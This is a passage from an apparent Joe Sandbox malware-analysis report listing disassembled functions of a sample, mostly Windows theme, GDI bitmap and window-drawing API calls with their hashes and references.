                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 032DB7BC
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 032DB7CE
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 032DB7E0
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 032DB7F2
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 032DB804
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 032DB816
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 032DB828
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 032DB83A
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 032DB84C
                                                                                                    • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 032DB85E
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 032DB870
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 032DB882
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 032DB894
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 032DB8A6
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 032DB8B8
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 032DB8CA
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 032DB8DC
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 032DB8EE
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 032DB900
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 032DB912
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 032DB924
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 032DB936
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 032DB948
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 032DB95A
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 032DB96C
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 032DB97E
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 032DB990
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 032DB9A2
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 032DB9B4
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 032DB9C6
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 032DB9D8
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 032DB9EA
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 032DB9FC
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 032DBA0E
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 032DBA20
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 032DBA32
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 032DBA44
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 032DBA56
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 032DBA68
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 032DBA7A
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 032DBA8C
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 032DBA9E
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 032DBAB0
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 032DBAC2
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 032DBAD4
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 032DBAE6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                    • API String ID: 2238633743-2910565190
                                                                                                    • Opcode ID: b082643431e5ef6c80476ed0c7471cc46c533b115d14c966de3957dc0826fd11
                                                                                                    • Instruction ID: 969761f889262025fb000d3966017a98a3f05a58002e2d5eac917875e11ef48f
                                                                                                    • Opcode Fuzzy Hash: b082643431e5ef6c80476ed0c7471cc46c533b115d14c966de3957dc0826fd11
                                                                                                    • Instruction Fuzzy Hash: CFA156B5A64750AFEF08FFB4D8E2DA937BCEB09740F014565B425DF60ADAB49880CB10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BE600 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 032BE609
                                                                                                      • Part of subcall function 032BE5D4: GetProcAddress.KERNEL32(00000000), ref: 032BE5ED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                    • API String ID: 1646373207-1918263038
                                                                                                    • Opcode ID: 34d1ddb9487ca6aefcf59378ab461b3c1768de4805f5e19b2ef554f23b44db18
                                                                                                    • Instruction ID: dec64d98315fb4374a42c847950b029f99c35898e5cd793a5490d54408e8cbfe
                                                                                                    • Opcode Fuzzy Hash: 34d1ddb9487ca6aefcf59378ab461b3c1768de4805f5e19b2ef554f23b44db18
                                                                                                    • Instruction Fuzzy Hash: 84410C6463C30C5BE208FA6974408EA77FCD644790B67C02AF405CAB58EF70BDC1876A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D36C8 Relevance: 37.7, APIs: 25, Instructions: 245windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 032D370B
                                                                                                    • SelectObject.GDI32(?,?), ref: 032D3720
                                                                                                    • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,CCAA0029,00000000,032D3790,?,?), ref: 032D3764
                                                                                                    • SelectObject.GDI32(?,?), ref: 032D377E
                                                                                                    • DeleteObject.GDI32(?), ref: 032D378A
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 032D379E
                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 032D37BF
                                                                                                    • SelectObject.GDI32(?,?), ref: 032D37D4
                                                                                                    • SelectPalette.GDI32(?,8A080D4D,00000000), ref: 032D37E8
                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 032D37FA
                                                                                                    • SelectPalette.GDI32(?,00000000,000000FF), ref: 032D380F
                                                                                                    • SelectPalette.GDI32(?,8A080D4D,000000FF), ref: 032D3825
                                                                                                    • RealizePalette.GDI32(?), ref: 032D3831
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 032D3853
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 032D3875
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 032D387D
                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 032D388B
                                                                                                    • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 032D38B7
                                                                                                    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 032D38DC
                                                                                                    • SetTextColor.GDI32(?,?), ref: 032D38E6
                                                                                                    • SetBkColor.GDI32(?,?), ref: 032D38F0
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D3903
                                                                                                    • DeleteObject.GDI32(?), ref: 032D390C
                                                                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 032D392E
                                                                                                    • DeleteDC.GDI32(?), ref: 032D3937
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                                                                                                    • String ID:
                                                                                                    • API String ID: 3976802218-0
                                                                                                    • Opcode ID: f4490c4455fc86460affe4763126b16bbefe1f853115cb61371efa2a7740e8e3
                                                                                                    • Instruction ID: b01c5dda7c0f770a8f614c1eef34096bf8367481f9a11a90628a532f067fd758
                                                                                                    • Opcode Fuzzy Hash: f4490c4455fc86460affe4763126b16bbefe1f853115cb61371efa2a7740e8e3
                                                                                                    • Instruction Fuzzy Hash: 28817DB6A10209AFDB50EFA8CD84EEFBBFCAB0D750F154554F618EB240C675AD408B61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D565C Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetObjectA.GDI32(?,00000054,?), ref: 032D567F
                                                                                                    • GetDC.USER32(00000000), ref: 032D56AD
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 032D56BE
                                                                                                    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 032D56D9
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D56F3
                                                                                                    • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 032D5715
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 032D5723
                                                                                                    • SelectObject.GDI32(?), ref: 032D576B
                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 032D577E
                                                                                                    • RealizePalette.GDI32(?), ref: 032D5787
                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 032D5793
                                                                                                    • RealizePalette.GDI32(?), ref: 032D579C
                                                                                                    • SetBkColor.GDI32(?), ref: 032D57A6
                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 032D57CA
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 032D57D4
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D57E7
                                                                                                    • DeleteObject.GDI32 ref: 032D57F3
                                                                                                    • DeleteDC.GDI32(?), ref: 032D5809
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D5824
                                                                                                    • DeleteDC.GDI32(00000000), ref: 032D5840
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 032D5851
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 332224125-0
                                                                                                    • Opcode ID: 4bb57c12748358043eb635178d7b3209a00d9c4a145b8ef2cbacd87478f3fe21
                                                                                                    • Instruction ID: 6fba00b147f9a424f185333acfc1f62bfb1b4fa89b6d175ee62bb564b8286731
                                                                                                    • Opcode Fuzzy Hash: 4bb57c12748358043eb635178d7b3209a00d9c4a145b8ef2cbacd87478f3fe21
                                                                                                    • Instruction Fuzzy Hash: BC51EC76E20309AFDB11EBE8DC45FEEB7FCAB09740F144465B614EB280D6B59984CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D63EC Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 032D665A
                                                                                                    • CreateCompatibleDC.GDI32(00000001), ref: 032D66BF
                                                                                                    • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 032D66D4
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D66DE
                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 032D670E
                                                                                                    • RealizePalette.GDI32(?), ref: 032D671A
                                                                                                    • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 032D673E
                                                                                                    • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,032D6797,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 032D674C
                                                                                                    • SelectPalette.GDI32(?,00000000,000000FF), ref: 032D677E
                                                                                                    • SelectObject.GDI32(?,?), ref: 032D678B
                                                                                                    • DeleteObject.GDI32(00000000), ref: 032D6791
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                                                                                    • String ID: ($BM
                                                                                                    • API String ID: 2831685396-2980357723
                                                                                                    • Opcode ID: 026dc785bb87bbaf5c46de79291b3c120a7324db834831c0bc0d90ce50d50bcb
                                                                                                    • Instruction ID: 1e05a38666f61880c21a01831b64297fbb88f965eaf903f03c05511c10577e43
                                                                                                    • Opcode Fuzzy Hash: 026dc785bb87bbaf5c46de79291b3c120a7324db834831c0bc0d90ce50d50bcb
                                                                                                    • Instruction Fuzzy Hash: 07D15A74A20219AFDF14DFA8C884BAEBBF5FF48300F548469E914EB395D7749884CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032F2DA0 Relevance: 25.8, APIs: 17, Instructions: 258COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowDC.USER32(00000000), ref: 032F2DD4
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 032F2DF7
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 032F2E09
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 032F2E1F
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 032F2E34
                                                                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,032F3053), ref: 032F2E4D
                                                                                                    • InflateRect.USER32(?,00000000,00000000), ref: 032F2E6B
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 032F2E85
                                                                                                    • DrawEdge.USER32(?,?,?,00000008), ref: 032F2F84
                                                                                                    • IntersectClipRect.GDI32(?,?,?,?,?), ref: 032F2F9D
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 032F2FC7
                                                                                                    • GetRgnBox.GDI32(?,?), ref: 032F2FD6
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 032F2FEC
                                                                                                    • IntersectRect.USER32(?,?,?), ref: 032F2FFD
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 032F3012
                                                                                                    • FillRect.USER32(?,?,00000000), ref: 032F302E
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 032F304D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2490777911-0
                                                                                                    • Opcode ID: 1c39feaea855196041dffaa59265d086b6ab5f4af5da568e90cea62233a1d806
                                                                                                    • Instruction ID: 473e3b782686f18dab91bb7b3b2181095fda1675d6f8c5fdb69f2f646c9a96cb
                                                                                                    • Opcode Fuzzy Hash: 1c39feaea855196041dffaa59265d086b6ab5f4af5da568e90cea62233a1d806
                                                                                                    • Instruction Fuzzy Hash: 2CA10975E10209AFCB01DBA8C895EEEB7FDAF49300F1480A5EA15FB251C775AA45CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D5B6C Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 032D6164: GetDC.USER32(00000000), ref: 032D61BA
                                                                                                      • Part of subcall function 032D6164: GetDeviceCaps.GDI32(00000000,0000000C), ref: 032D61CF
                                                                                                      • Part of subcall function 032D6164: GetDeviceCaps.GDI32(00000000,0000000E), ref: 032D61D9
                                                                                                      • Part of subcall function 032D6164: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,032D4D27,00000000,032D4DB3), ref: 032D61FD
                                                                                                      • Part of subcall function 032D6164: ReleaseDC.USER32(00000000,00000000), ref: 032D6208
                                                                                                    • SelectPalette.GDI32(?,?,000000FF), ref: 032D5BAF
                                                                                                    • RealizePalette.GDI32(?), ref: 032D5BBE
                                                                                                    • GetDeviceCaps.GDI32(?,0000000C), ref: 032D5BD0
                                                                                                    • GetDeviceCaps.GDI32(?,0000000E), ref: 032D5BDF
                                                                                                    • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 032D5C12
                                                                                                    • SetStretchBltMode.GDI32(?,00000004), ref: 032D5C20
                                                                                                    • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 032D5C38
                                                                                                    • SetStretchBltMode.GDI32(00000000,00000003), ref: 032D5C55
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 032D5CB6
                                                                                                    • SelectObject.GDI32(?,?), ref: 032D5CCB
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D5D2A
                                                                                                    • DeleteDC.GDI32(00000000), ref: 032D5D39
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2414602066-0
                                                                                                    • Opcode ID: 9ad9e042876c54314f6923c9df0b8b6c7418111700c64dbf03ebf51459a63ef3
                                                                                                    • Instruction ID: 1ca410d2b4318462d7bb38205bf246fef33ce7b39ab58d824c6821d082fa63df
                                                                                                    • Opcode Fuzzy Hash: 9ad9e042876c54314f6923c9df0b8b6c7418111700c64dbf03ebf51459a63ef3
                                                                                                    • Instruction Fuzzy Hash: 14711A79A14205AFDB50DFACC985F9EBBF8AF09300F248554B518EB691D7B4ED80CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D3528 Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 032D353F
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 032D3549
                                                                                                    • GetObjectA.GDI32(?,00000018,?), ref: 032D3569
                                                                                                    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 032D3580
                                                                                                    • GetDC.USER32(00000000), ref: 032D358C
                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 032D35B9
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 032D35DF
                                                                                                    • SelectObject.GDI32(?,?), ref: 032D35FA
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D3609
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 032D3635
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D3643
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 032D3651
                                                                                                    • DeleteDC.GDI32(?), ref: 032D3667
                                                                                                    • DeleteDC.GDI32(?), ref: 032D3670
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                                    • String ID:
                                                                                                    • API String ID: 644427674-0
                                                                                                    • Opcode ID: 3ad03305532846b54da3b7dd09bc2bae35ad6742b1aaf3d917ad5c698de839f9
                                                                                                    • Instruction ID: 263418ae1f8d8cd0cb4874fcdd5144a9784b98f0018a7a683bfa6c17678ff3e7
                                                                                                    • Opcode Fuzzy Hash: 3ad03305532846b54da3b7dd09bc2bae35ad6742b1aaf3d917ad5c698de839f9
                                                                                                    • Instruction Fuzzy Hash: 0E410D7AE14309AFDB51EBE8CC45FAEB7BCEB08740F004451F614EB240D6B599808BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B743C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61windowregistryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 032B7454
                                                                                                    • RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 032B7460
                                                                                                    • RegisterWindowMessageA.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 032B746F
                                                                                                    • RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 032B747B
                                                                                                    • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 032B7493
                                                                                                    • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 032B74B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Window$Register$Send$Find
                                                                                                    • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                    • API String ID: 3569030445-3736581797
                                                                                                    • Opcode ID: 1d9a84d294e61febc53d96c158aa70136870293b5b0d6fd02ab35d1b4f6c23ac
                                                                                                    • Instruction ID: dcaaf4b9099902c4fb1d3637886c510d4072197c8b98e52e0621608c4525b05e
                                                                                                    • Opcode Fuzzy Hash: 1d9a84d294e61febc53d96c158aa70136870293b5b0d6fd02ab35d1b4f6c23ac
                                                                                                    • Instruction Fuzzy Hash: B6111F75264302AFE710DFADDC41BAABBB8EF94791F148465B9C48F281D6B099C0CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032DDDAC Relevance: 18.1, APIs: 12, Instructions: 142COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 032DDDC7
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 032DDDE2
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 032DDDF7
                                                                                                    • GetWindowDC.USER32(00000000,?,?,?,00000000,?), ref: 032DDE05
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 032DDE36
                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 032DDE4B
